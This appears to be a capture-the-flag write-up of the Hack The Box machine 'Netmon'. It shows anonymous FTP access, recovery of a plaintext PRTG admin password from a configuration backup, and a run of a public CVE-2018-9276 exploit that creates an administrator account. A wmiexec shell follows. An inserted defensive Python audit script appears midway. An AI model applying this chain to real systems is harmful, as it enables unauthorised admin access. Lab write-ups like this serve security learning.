Netmon – 10.10.10.152

Nmap scan:

First observation: ftp – anonymous login allowed

PRTG 18.1.37

Let’s try ftp anonymous login:

FTP session:

root@kali:~/Documents/HTB/Netmon-10.10.10.152# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

Basic shell – nice!

Let’s cd around

Holy shit that was easy!

Now onto root:

PRTG 18.1.37 -> known vulnerability ->

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

So the app leaves plaintext passwords behind in its configuration backup files.

From the KB article:

Automatically generated temporary files that may exist:
E:\PRTG\PRTG Configuration.old
E:\PRTG\PRTG Configuration.nul

Let’s search for them

Get 3 config files and look in all of them for plaintext passwords

Hint: append .txt to the filename and open it with leafpad

Search on password
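As an added example (not part of this write-up): a small Python audit that scans leftover PRTG configuration backups for password elements stored without an encrypted flag. The sample config is constructed, and the tag and flag naming is an assumption, not taken from PRTG documentation.

```python
import re
from pathlib import Path

# Constructed sample resembling a PRTG-style configuration backup (assumption:
# password elements are XML-like tags ending in "password", with an <encrypted/>
# flag when the value is not plaintext). Values here are made up.
SAMPLE_CONFIG = """<data>
  <dbpassword>
    <!-- User: example-admin -->
    Example-Plaintext-Pass
  </dbpassword>
  <windowsloginpassword>
    <flags><encrypted/></flags>
    ENCRYPTED-BLOB-EXAMPLE
  </windowsloginpassword>
</data>
"""

# Any element whose tag name ends in "password"; the backreference closes it.
PASSWORD_ELEMENT = re.compile(r"<(\w*password)>(.*?)</\1>", re.IGNORECASE | re.DOTALL)

def find_plaintext_passwords(config_text: str) -> list[tuple[str, str]]:
    """Return (tag, value) pairs for password elements not flagged as encrypted."""
    findings = []
    for match in PASSWORD_ELEMENT.finditer(config_text):
        tag, body = match.group(1), match.group(2)
        if "<encrypted/>" in body.lower():
            continue  # stored encrypted: not a finding
        # Drop nested tags and comments, keep the bare value
        value = re.sub(r"<!--.*?-->|<[^>]+>", "", body, flags=re.DOTALL).strip()
        if value:
            findings.append((tag, value))
    return findings

def audit_backup_files(directory: Path) -> dict[str, list[tuple[str, str]]]:
    """Scan leftover backup copies (.old, .old.bak, .nul) of the PRTG config."""
    results = {}
    for path in directory.glob("PRTG Configuration*"):
        if path.suffix.lower() in {".old", ".bak", ".nul"}:
            hits = find_plaintext_passwords(path.read_text(errors="replace"))
            if hits:
                results[path.name] = hits
    return results

if __name__ == "__main__":
    for tag, value in find_plaintext_passwords(SAMPLE_CONFIG):
        print(f"plaintext credential in <{tag}>: {value}")
```

Point audit_backup_files at the PRTG data directory to list every leftover backup that still carries a plaintext credential.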

.old.bak had this

Screenshot: PRTG Network Monitor (NETMON) login page, “Your login has failed. Please try again!”

Failed…

Going through the forum, someone said “what year are we in rn?”

Trying 2019…

Screenshot: logged in at http://10.10.10.152/welcome.htm, “Welcome PRTG System Administrator!”

PRTG 18.1.37 RCE exploit (CVE-2018-9276):

https://github.com/M4LV0/PRTG-Network-Monitor-RCE

Use Burp to capture the session cookie

Burp Suite (Intercept is on), request to http://10.10.10.152:80:

GET /welcome.htm HTTP/1.1
Host: 10.10.10.152
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,…
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.152/public/login.…
Cookie: _ga=GA1.4.1647149010.1555166354; _gid=GA1.4.1405493387.1555439550; OCTOPUS1813713946=<session cookie value>
Connection: close
Upgrade-Insecure-Requests: 1

Feed it to the exploit

Running the exploit:

root@kali:/opt/PRTG-Network-Monitor-RCE# ./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.1647149010.1555166354; _gid=GA1.4.1405493387.1555439550; OCTOPUS1813713946=<session cookie value>"

PRTG RCE script by M4LV0
https://github.com/M4LV0
Authenticated PRTG Network Monitor remote code execution CVE-2018-9276
# login to the app, default creds are prtgadmin/PrTg@dmin2019. once authenticated grab your cookie and add it to the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3St!'

file created
sending notification wait...
adding a new user 'pentest' with password 'P3nT3St!'
sending notification wait...
adding a user pentest to the administrators group
sending notification wait...
exploit completed new user 'pentest' with password 'P3nT3St!'

Now we have created a user. Time to connect with it.

https://github.com/SecureAuthCorp/impacket

Connecting with Impacket wmiexec:

python wmiexec.py pentest@10.10.10.152
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
netmon\pentest

Got root shell!!!

Root flag check

3018977fb944bf1878f75b879fba67cc -> root flag is the password since the box is still active (just remove this line in the write-up)